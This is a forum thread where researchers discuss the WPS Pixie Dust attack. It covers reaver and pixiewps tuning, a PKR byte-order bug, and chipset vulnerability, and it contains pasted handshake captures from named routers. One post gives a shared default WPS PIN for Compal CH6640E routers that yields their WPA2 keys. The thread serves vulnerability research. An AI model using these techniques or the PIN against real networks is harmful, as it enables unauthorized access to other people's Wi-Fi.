WPS Pixie Dust Attack (Offline WPS Attack)

[mmusket33]

Pixie Dust Data Types and successful WPS pin extraction.

There are(2) two types of Pixie Dust Data Sequences:

When --dh-small is used in the reaver command line the -PKR sequence is fixed and not variable.

When --dh-small is not use the -PKR variable constantly changes.

Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key while the same reaver command line without the --dh-small in the command line thus -PKR was variable, provided data that DID extract the WPS Key.

MTeams suggest that if you run a --dh-small attack and do not acquire the WPS key from the data, remove the --dh-small from the reaver command line, collect some more Pixie Dust data sequences with a variable -PKR and try again.


MTeams Labs

[wiire]

Pixie Dust Data Types and successful WPS pin extraction.
Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key while the same reaver command line without the --dh-small in the command line thus -PKR was variable, provided data that DID extract the WPS Key.

I just want to point out that the tool is not completed yet, it works only (for Realtek) if the 3 nonces are generated within THE SAME second. So we can't be sure wether --dh-small cause bugs. I think you should try to supply the right pin with Reaver to the AP using --dh-small. If it works and the AP goes past the M3 then it should means that it works with --dh-small too (unless there's a bug in my code lol).

[mmusket33]

To wiire


Further PKR corrections when using --dh-small in the reaver command line

Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However in all the output provided by the modded reaver, the PKR variable when dh-small is used show the 02 at the beginning of the string and the key is never found

MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.

In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

Musket Teams Labs

[wiire]

To wiire


Further PKR corrections when using --dh-small in the reaver command line

Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However in all the output provided by the modded reaver, the PKR variable when dh-small is used show the 02 at the beginning of the string and the key is never found

MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.

In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

Musket Teams Labs

PKr gets printed in little-endian when using small keys (only). When adding the lines of code to print PKr I didn't test with -S, ops. If you sniff the traffic with Wireshark you see it's OK. BTW if you use pixiewps with small keys (-S) the program will automatically set PKr = 2 (00: ... :02).

That's beacuse with small keys Reaver sets its private number = 1. Thus: g^A mod P = 2^1 mod P = 2 (P is a huge prime number > 2).

Anyway now the recommended version of Reaver is the one made and mainteined by t6_x and datahead (which prints it right). I updated the link to my original post.

[wn722]

uhm, anyone had any luck with atheros chipsets yet?

[soxrok2212]

uhm, anyone had any luck with atheros chipsets yet?

I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.

[Saydamination]

I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.

Hi soxrox ,

I have a few TP LiNK RTL 8671 EV 2006 07 27 Realtek chipset modem information ( modem pictures, eap-eapol cap files )

I can send you ... Maybe you can use for analyz...

TPLiNK uses generaly this chipset...

send me an email...

thanks..

[soxrok2212]

Hi soxrox ,

I have a few TP LiNK RTL 8671 EV 2006 07 27 Realtek chipset modem information ( modem pictures, eap-eapol cap files )

I can send you ... Maybe you can use for analyz...

TPLiNK uses generaly this chipset...

send me an email...

thanks..

My e-mail is my username @gmail.com

[Saydamination]

My e-mail is my username @gmail.com

Hi soxrok ,

I sent an e-mail ...

good luck

[someone_else]

some updates for the database ;-)


Compal CH6640E
Realtek RTL8192CE
After successful PIN-Test reaver brings for PSK + SSID "(null)" ?
So, what else, its some kind of VULNERABLE .

Code:

[P] E-Nonce: 07:ee:41:56:16:0a:54:d7:0d:c7:1e:a9:43:83:c1:a0
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: c6:5a:4c:48:87:b9:24:fb:b3:f8:0f:de:b4:4c:cc:82:23:cf:6c:55:2b:4c:d8:a3:a8:c8:a8:da:aa:ba:28:ab:c8:95:d1:aa:04:a2:10:f8:01:31:62:40:46:e0:cc:a8:6c:07:9a:8c:5f:5c:1e:c5:13:53:c7:69:cc:55:ce:0a:de:38:27:a1:9c:75:e5:09:e9:55:71:5e:60:3d:e7:a4:6f:88:60:4e:da:8e:de:c3:74:48:fb:ad:8a:16:77:2b:0d:4f:d6:cc:5d:85:0e:59:44:a9:de:3f:85:a1:49:80:ec:88:79:b2:4e:00:8a:6b:a5:db:27:62:3c:59:d8:e9:8f:f4:3e:09:76:74:5f:10:99:d1:33:39:69:a7:c6:2a:aa:60:29:1b:9c:5f:4f:d4:b2:a2:08:cd:67:d0:de:59:12:be:24:9e:69:6e:f0:a7:6b:70:2d:4f:db:5a:b5:cb:36:2b:44:4a:c7:e0:42:50:a8:6c:d4:a5:da:e4:46:51
[P] AuthKey: a1:3d:2a:8b:ce:3a:27:e2:09:11:f8:63:e4:95:c1:c9:18:0e:2a:9b:fa:f1:06:b4:88:a0:d4:63:98:04:44:f5
[P] E-Hash1: 5c:b7:48:b9:b2:cc:1f:5b:17:5b:f3:c6:ce:ca:83:c1:9e:c2:08:f6:bf:35:de:3f:cd:0f:34:80:b9:6e:16:51
[P] E-Hash2: 45:2a:e1:1e:2e:f7:c9:9d:a2:7a:c3:d8:c0:02:0e:aa:2d:f8:18:2d:28:61:78:93:bd:e2:a2:09:31:f3:f5:1e

NOT VULNERABLE:

TP-LINK TL-WR740n v1/v2
Broadcom BCM5356

Code:

[P] E-Nonce: 28:68:6d:cf:7d:d7:09:e4:72:3b:c3:51:be:27:a6:16
[P] PKE: 85:c2:b7:ed:9a:a8:04:39:8e:7e:cd:1c:f3:c3:df:e6:7e:07:91:cc:80:98:56:38:8d:e1:b7:42:57:7f:62:e2:a0:39:8f:e3:84:48:ce:10:87:66:a7:5b:91:d2:b5:8e:ec:cb:4c:8c:96:5a:c7:66:11:61:e5:78:42:55:3a:65:8d:ef:b1:d2:69:e7:ce:06:a3:b4:36:bd:c1:e9:2c:e8:46:2d:44:e3:93:66:c6:48:85:a0:ac:14:ee:11:b7:76:68:61:0a:ef:be:ed:a3:19:31:70:68:c2:fb:eb:65:c6:44:6a:02:d6:fb:25:8e:6a:10:2f:38:8a:a5:a6:de:c3:69:f9:b0:2b:0a:2b:ce:12:a8:4f:b6:dc:be:48:c0:d7:28:08:d8:4d:10:e7:89:9b:15:54:10:d3:a0:25:d1:da:7c:48:2d:22:87:e1:8d:2b:2b:f6:0f:3f:ab:14:3e:8d:ab:c5:5a:b8:8b:4a:a4:60:38:6b:dd:66:25:c1:ca:1e
[P] PKR: 2e:56:24:ad:1d:7e:77:0f:a8:b9:fd:6b:4b:9b:ed:38:23:e7:44:c8:72:ef:ea:5e:57:bd:6a:a4:05:31:8b:70:81:30:03:80:cb:83:f5:ba:81:68:69:b1:cb:cf:d1:d4:86:8d:d0:25:1c:0d:03:b1:8f:47:4e:1b:3f:01:ec:62:c2:51:e4:6a:54:59:96:e0:7c:72:0a:bf:64:2d:de:cf:d8:49:f5:ca:ae:88:5a:d1:ff:9f:ac:ff:32:9a:fb:33:64:fa:2f:44:93:aa:56:64:e4:9d:41:3e:3a:44:99:53:1d:f6:b3:b4:82:94:fa:dc:aa:a1:56:61:0b:d5:80:48:e3:5d:53:d2:36:fb:6f:85:8a:9c:08:af:62:1a:0b:ea:23:70:b3:63:0a:ea:4f:3e:62:7c:5d:ba:11:2d:41:9c:4f:3e:18:2c:fd:94:11:ad:a3:8c:c9:75:11:da:a3:ee:62:84:36:03:fc:bd:a5:b5:b3:0e:73:81:4b:61:7d:3f
[P] AuthKey: cc:e9:3a:92:e6:1c:dd:a2:ab:92:d7:f3:13:a0:d3:67:92:cd:75:7b:19:f6:9a:44:18:77:e6:17:ee:5c:33:3a
[P] E-Hash1: 83:90:f2:7e:17:5d:44:c4:38:c3:4e:cb:bc:80:92:0d:77:b3:40:97:35:d5:9b:9a:da:a4:10:49:1b:b4:0f:07
[P] E-Hash2: e2:c2:90:1e:c2:21:ac:c4:4e:48:b6:4a:d9:cc:67:b1:e1:67:7e:01:5e:af:33:53:40:fc:07:2a:ef:a1:d5:29

NOT VULNERABLE:

Belkin F7D1301 v1
Broadcom BCM5356A1

Code:

[P] E-Nonce: 84:87:88:e4:b0:9c:15:6c:20:cc:36:58:40:7c:83:6d
[P] PKE: 17:17:85:b8:2d:a4:54:d8:55:85:e2:0e:78:f2:94:56:29:b4:d8:d6:f8:d6:9b:43:1c:d8:b5:c7:49:dd:e6:43:d9:43:f8:bb:8a:aa:54:94:b8:01:7f:67:81:95:92:c1:9d:f6:4f:9c:0a:db:83:b4:23:2f:b6:61:7d:01:67:8f:10:30:94:e7:d7:f5:db:bd:ea:44:cb:92:ec:00:a3:02:73:c5:5b:c7:13:e0:88:a0:49:af:7a:15:55:69:ba:06:aa:b4:49:a5:10:f7:1d:cc:b6:ad:f5:09:05:77:05:10:5e:3b:5a:a9:83:98:0f:d8:0b:76:d0:db:4f:1e:e7:0d:81:7b:37:23:bb:9f:1b:c5:13:ad:98:fc:af:29:bf:91:6a:ef:1d:ef:f4:74:29:b7:de:8f:9d:8c:a4:4f:dc:98:90:26:13:30:3b:9e:db:d6:bd:b7:25:a3:0e:31:69:ab:e7:bb:bd:b5:48:9d:c6:aa:a0:95:b3:9f:10:02:e3:a0
[P] AuthKey: a6:27:f5:13:be:0c:41:cc:24:1c:c3:a7:c7:99:20:48:c9:dd:b0:51:82:a0:51:29:2b:7b:2e:18:8b:76:fc:24
[P] E-Hash1: c4:0d:69:f7:ca:eb:50:5e:e9:84:8f:ab:0b:21:2b:5c:fa:90:21:f6:a2:98:9a:ef:ef:12:a5:5e:3c:d3:61:a4
[P] E-Hash2: 86:94:0c:25:ea:ac:32:15:7a:71:2a:66:50:b3:e7:3a:c6:3d:02:1a:7a:4f:74:71:87:f3:df:54:ba:b4:21:98

NOT VULNERABLE:

ASUS RT-AC66U
Broadcom BCM4706

Code:

[P] E-Nonce: cf:93:1f:a3:6e:ac:6d:76:45:54:a3:06:cc:2d:36:2b
[P] PKE: 24:b3:71:23:bb:44:69:98:6a:d5:a6:e4:99:a5:5f:6d:c6:75:e6:87:6e:50:ca:b6:88:13:c7:a3:b3:1f:5b:66:16:70:ee:a8:1a:33:08:0c:e9:98:28:cf:6d:54:d3:f9:52:73:5d:7a:10:0c:84:9c:81:74:2e:ec:85:d9:be:d6:75:49:bf:78:d9:a0:da:86:1b:9a:50:a4:5f:ea:f8:fc:68:b8:a4:a3:9c:bc:87:92:a4:a1:17:8f:00:76:39:9a:d5:33:01:41:86:7d:e5:83:ca:06:6d:6c:a7:ae:10:94:55:fb:74:23:e1:7a:d3:35:e5:62:1d:4c:c4:e6:cf:47:ff:ea:1d:b3:ce:03:b7:32:42:f7:c7:bb:bc:eb:94:03:71:86:04:63:6f:b2:97:36:40:b1:3b:b1:80:25:5c:70:90:79:a7:4e:3f:c4:b8:ad:e5:8c:ff:c7:65:a6:3a:95:fc:40:6a:8a:f9:80:ef:18:6b:d4:6d:40:6e:e3:ae:2a
[P] PKR: 23:3a:61:72:e4:59:9f:bd:f4:70:b6:5a:e9:6b:d4:e2:28:14:ed:ca:38:89:c0:4e:77:b6:22:78:3d:74:99:fe:cd:52:d6:e1:ea:14:06:2e:86:f4:9b:77:4c:0e:a9:b3:06:56:0b:4a:11:d1:46:4c:62:b6:56:cf:61:98:2d:e7:95:3a:1e:01:e5:b0:50:12:a0:36:c5:4a:e1:d1:68:50:8a:c3:f5:de:5a:2b:ce:82:62:41:81:6a:a2:9b:0f:14:63:b1:0b:f0:db:82:19:2f:5a:6a:a5:b2:9d:cd:f1:36:fb:e6:ad:13:77:79:bf:77:80:b3:72:6e:d7:76:62:dc:1d:ca:81:a1:f8:f3:56:c7:f1:92:59:70:ca:db:2c:43:16:db:ea:a6:3a:40:6f:59:9c:b8:3e:db:e6:21:11:21:38:9e:d8:2c:e0:df:85:40:4d:4e:a7:93:e3:ee:eb:f8:25:c9:98:c0:e8:49:8b:6e:b3:c4:1a:f9:72:18:a4:53
[P] AuthKey: 64:9b:23:3a:c5:4d:84:1b:9d:8d:ef:49:64:d4:02:de:7d:b0:73:7b:c1:28:61:69:7f:a1:0e:b6:11:59:1c:d6
[P] E-Hash1: 45:32:81:a0:27:f4:2e:b5:e7:31:27:79:ed:ae:0c:d7:a9:22:66:9f:43:8d:07:a0:a4:23:03:55:c6:e7:ea:d3
[P] E-Hash2: d1:5a:cd:32:79:52:73:4a:d5:83:96:1b:59:9b:76:5f:d3:5f:77:d8:1a:d8:86:7e:d9:d3:46:03:f2:b7:1b:3d

[soxrok2212]

Sweet thanks! Just updated everything.. should be all set

[SubZero5]

Not vulnerable:

ZyXEL VMG3312-B10A
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: VMG3312-B10A
[P] WPS Model Serial Number: 96368GW

Code:

[P] E-Nonce: 10:74:5a:93:5d:0c:e9:38:fb:27:0d:2c:44:6a:47:aa
[P] PKE: bf:ce:38:9a:76:34:e7:62:2a:09:72:5d:12:04:e0:1b:c3:94:1b:38:d5:6f:9b:bc:1e:fe:48:17:26:62:6f:27:b1:53:50:e1:d7:0d:65:09:30:90:4f:fd:80:4c:eb:c5:5b:9c:f8:c6:e0:66:79:10:72:91:32:e6:a5:93:ce:90:3b:5c:c3:8c:be:97:fd:a3:ca:65:44:98:fc:5b:92:ae:ca:dd:56:42:d0:72:dc:66:1c:89:c6:9d:d1:07:0a:40:dc:88:76:60:c5:55:20:75:d6:83:5a:19:37:e9:9f:df:35:72:66:b7:ca:94:e3:cd:75:30:2a:27:dc:03:97:fa:3b:a3:3d:52:3f:4a:47:f5:07:76:02:d9:68:a2:41:5f:5a:04:2c:00:74:c5:e5:8a:a8:ea:c3:f0:c3:af:d8:a4:fa:8a:70:5c:9d:48:b2:e3:f4:2e:57:7c:a3:23:0f:88:c7:10:4b:cf:6e:aa:1e:cc:65:92:f6:30:16:dd:76:db
[P] PKR: d6:35:6a:d5:96:cb:22:1f:dc:8e:3e:36:98:81:3c:26:f4:73:27:7c:00:f4:0a:0f:4d:5e:ff:e0:3f:a7:24:d1:6e:39:00:7e:65:cd:f6:10:f9:63:4a:47:54:a2:83:f0:4b:4d:61:8a:6b:0f:f6:3c:c9:fb:30:b7:d5:6a:cd:60:6a:26:37:e1:19:d9:e1:a4:62:44:c9:05:8c:65:04:d5:9f:e0:04:06:5e:5f:2d:1d:01:42:69:c7:a2:01:76:c0:71:87:6d:f0:11:36:e4:9c:6c:61:0f:5a:82:06:e7:f8:b8:f0:f5:3a:5f:6b:ad:6e:7b:a2:73:b5:a3:b3:45:9e:b4:17:c9:4b:4f:03:25:ea:a5:9d:ff:85:6c:15:53:b1:58:7a:c2:c6:fb:b1:96:34:44:9a:c7:38:e4:99:b4:27:7c:12:90:84:a4:94:4f:d9:79:df:2d:44:7e:8d:98:e0:1f:bf:42:19:a2:53:ee:8c:39:d5:57:e4:85:b2:09:e2
[P] AuthKey: 75:2f:50:4b:1f:e5:69:92:8d:f5:9e:3f:6c:29:47:7e:87:0d:2d:6e:ba:71:c8:ae:23:00:e7:ff:f7:a5:d0:94
[P] E-Hash1: 30:b0:f8:c1:d0:ae:d1:72:bc:65:46:65:94:a3:8d:09:47:82:78:ed:bd:2e:db:b8:49:4a:7e:19:7d:e7:8f:05
[P] E-Hash2: 5e:b9:8b:28:34:79:09:d5:b5:99:48:34:14:78:3c:ea:f2:ef:0a:a2:ac:c4:5a:97:1e:a7:41:4d:6e:36:5c:e3

[soxrok2212]

ZyXEL VMG3312-B10A
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: VMG3312-B10A
[P] WPS Model Serial Number: 96368GW

Awesome thanks

[someone_else]

some updates for the database ;-)


Compal CH6640E
Realtek RTL8192CE
After successful PIN-Test reaver brings for PSK + SSID "(null)" ?
So, what else, its some kind of VULNERABLE .

Code:

[P] E-Nonce: 07:ee:41:56:16:0a:54:d7:0d:c7:1e:a9:43:83:c1:a0
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: c6:5a:4c:48:87:b9:24:fb:b3:f8:0f:de:b4:4c:cc:82:23:cf:6c:55:2b:4c:d8:a3:a8:c8:a8:da:aa:ba:28:ab:c8:95:d1:aa:04:a2:10:f8:01:31:62:40:46:e0:cc:a8:6c:07:9a:8c:5f:5c:1e:c5:13:53:c7:69:cc:55:ce:0a:de:38:27:a1:9c:75:e5:09:e9:55:71:5e:60:3d:e7:a4:6f:88:60:4e:da:8e:de:c3:74:48:fb:ad:8a:16:77:2b:0d:4f:d6:cc:5d:85:0e:59:44:a9:de:3f:85:a1:49:80:ec:88:79:b2:4e:00:8a:6b:a5:db:27:62:3c:59:d8:e9:8f:f4:3e:09:76:74:5f:10:99:d1:33:39:69:a7:c6:2a:aa:60:29:1b:9c:5f:4f:d4:b2:a2:08:cd:67:d0:de:59:12:be:24:9e:69:6e:f0:a7:6b:70:2d:4f:db:5a:b5:cb:36:2b:44:4a:c7:e0:42:50:a8:6c:d4:a5:da:e4:46:51
[P] AuthKey: a1:3d:2a:8b:ce:3a:27:e2:09:11:f8:63:e4:95:c1:c9:18:0e:2a:9b:fa:f1:06:b4:88:a0:d4:63:98:04:44:f5
[P] E-Hash1: 5c:b7:48:b9:b2:cc:1f:5b:17:5b:f3:c6:ce:ca:83:c1:9e:c2:08:f6:bf:35:de:3f:cd:0f:34:80:b9:6e:16:51
[P] E-Hash2: 45:2a:e1:1e:2e:f7:c9:9d:a2:7a:c3:d8:c0:02:0e:aa:2d:f8:18:2d:28:61:78:93:bd:e2:a2:09:31:f3:f5:1e

@Soxrok2212
some Information about the Compal-Device. Testet with 8 Devices, each of them has the same Pin 47385580 which leads (with friendly Help from Bully) to the correct WPA2-Key (which was different in all 8 cases).

[soxrok2212]

Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully Please

[someone_else]

Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully Please

Hi,
checked three of them, each one has as Default-PIN 47385580 in WPS Settings.
For 7 Models with Reaver --> PSK + SSID "(null)", only one shows SSID and PSK. Bully delivers both Values correctly.
Btw: In your Pixie-Database is a second Compal-Device listed (CBN-106-145-065). Those CBN-xxx-xxx-xxx number is different at each Router i've tested. So its probably the same Model.

Here are 5 of them:

Code:

[P] E-Nonce: 74:d4:79:d4:5f:37:5d:a2:55:95:b3:8e:3e:b4:42:b0
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: b7:b5:92:8b:37:23:d1:97:30:cc:fd:86:06:88:40:05:ee:d9:d3:50:9e:4b:04:1a:c7:ce:2a:43:73:69:79:74:eb:ca:03:4d:c4:01:c2:1d:2d:54:df:11:89:ad:23:6b:63:15:c0:d2:80:32:29:38:a8:3f:27:34:85:8e:7e:f3:5d:48:1d:51:3f:36:3d:fa:0b:bf:3e:4c:69:9c:0e:15:ed:0c:f2:06:39:a6:44:df:07:26:0d:c3:97:f8:02:9f:3c:c0:7c:ae:e1:63:82:f3:e6:11:7c:08:86:cd:11:17:28:d3:df:fe:ea:9a:bf:b6:04:23:62:a9:69:52:2c:be:f8:47:84:b8:29:1e:34:ab:ae:73:e5:b2:5c:d9:7e:15:0a:67:4f:9e:b8:f5:ab:02:6c:42:51:70:f9:75:17:1f:0b:14:9b:2b:47:15:7f:0c:c7:93:f1:bc:55:21:fe:7e:e7:43:17:f3:dd:28:3c:3f:09:a8:f9:e5:2b:30:46:a0
[P] AuthKey: 17:c4:8c:1c:30:2d:b7:07:95:19:7e:d7:dc:cb:c5:c2:54:31:c2:98:81:4c:e3:61:7e:6e:1f:8e:01:44:af:41
[P] E-Hash1: 29:ee:d1:39:09:2f:ed:6c:b6:fe:3f:d9:7e:65:42:1a:a9:bb:5f:09:92:5f:4a:13:de:71:15:0c:39:62:f7:b2
[P] E-Hash2: ad:14:f5:b9:34:99:c7:99:17:2f:b2:d4:fb:d2:52:af:dc:04:61:54:69:d6:a3:47:55:e8:20:37:d2:23:7c:7a

Code:

[P] E-Nonce: 76:fd:23:67:28:98:00:14:74:08:2c:e2:58:e6:08:7b
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f1:0e:83:37:1e:6d:29:4a:ef:30:56:56:ef:75:6c:e4:b9:43:e1:27:e6:e8:52:cd:ed:e3:fa:9f:0d:08:15:bc:90:ac:94:2f:c9:85:c3:0d:f3:3b:cb:56:ad:5d:74:01:05:1c:9e:43:60:74:62:79:0e:5e:6d:b5:5e:e6:06:b6:8c:b5:7e:d0:eb:ed:17:6a:76:ca:aa:c2:f5:0e:8c:b7:da:e6:3a:ba:f9:1d:04:34:92:fc:91:0c:8c:e5:bb:70:58:22:95:34:85:54:ba:c3:cb:d7:c6:3e:65:d1:0f:91:0d:b9:d2:98:cc:a8:25:db:d8:0a:c9:f0:40:5f:4c:36:84:1a:f6:83:3a:5b:82:1e:44:d0:be:b8:29:ad:1f:0d:8b:bb:29:b8:7f:4d:12:0f:c7:c6:50:b0:2b:97:16:4a:89:b5:7c:cd:06:ab:03:59:4d:fe:3c:b9:7e:35:24:fc:24:b2:4a:67:c8:3c:b3:6e:7b:45:e9:d2:36:bf:02:9f
[P] AuthKey: 5a:90:d3:1a:7f:0a:24:a5:3d:29:47:c5:b9:ca:65:83:86:e0:9a:76:75:3c:47:e3:28:b6:1c:33:95:1e:ee:e4
[P] E-Hash1: 7b:ff:91:d0:ca:6f:c1:c6:c0:fb:5f:a6:21:27:54:1b:1b:1f:60:82:53:8f:26:f7:d8:55:4d:1e:49:1a:6a:6e
[P] E-Hash2: 79:8f:b2:12:da:68:b0:3d:89:8b:80:b3:43:cb:9f:f0:2c:c2:50:ec:30:dd:19:78:8d:b7:83:a0:27:df:5d:eb

Code:

[P] E-Nonce: 45:2a:2b:5c:25:9d:91:39:42:e9:38:7c:7a:d1:1b:1c
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: ac:1c:fa:9e:2a:80:76:e8:40:44:ff:9e:a3:6a:3a:c0:6d:8b:92:53:bf:98:ae:7a:22:60:c5:22:3f:40:a3:aa:16:19:37:76:dc:5f:49:67:ac:2b:4d:a6:b1:3e:87:7c:a4:b0:3b:55:56:88:75:b5:a9:e6:a9:55:c0:26:eb:68:f7:5d:84:06:c7:77:e5:55:fa:49:fe:45:03:84:2c:5d:bc:b9:76:99:f8:93:32:73:2c:2a:a7:0d:eb:1d:4c:3d:2a:7e:a7:a0:62:ee:51:1a:f8:39:f5:33:40:71:1b:10:18:39:da:27:b4:5b:3a:75:6e:86:45:92:a1:df:fe:75:2a:27:98:28:1e:a7:cc:a9:b3:58:2d:c8:14:33:80:55:3d:ac:f0:bf:65:a7:05:f3:6d:90:2c:0e:4f:29:95:b7:dc:49:f9:58:9e:1c:7d:d8:07:d7:c1:f3:8c:4b:4d:98:a1:0d:01:0e:5a:4d:66:26:09:73:d1:02:03:f7:16:8c
[P] AuthKey: 5a:3d:0b:a3:41:42:b2:8f:18:35:1f:a9:b3:be:45:1f:ef:a7:0d:32:f0:3d:06:59:51:bb:8a:b2:e1:26:eb:5f
[P] E-Hash1: b3:a9:37:ba:30:37:d7:65:d0:6e:5e:93:a1:60:0f:9f:7d:2f:f6:7c:1b:80:3e:72:84:fa:84:5b:9d:63:0f:06
[P] E-Hash2: 98:16:a7:fc:8c:0c:ce:1c:2c:58:dd:8e:1b:b1:92:ac:ca:4b:56:df:9e:0c:d3:9c:89:da:e7:7f:90:9e:83:d3

Code:

[P] E-Nonce: 14:d1:e7:b1:50:ea:91:a3:0f:8b:e5:97:63:61:ef:3c
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
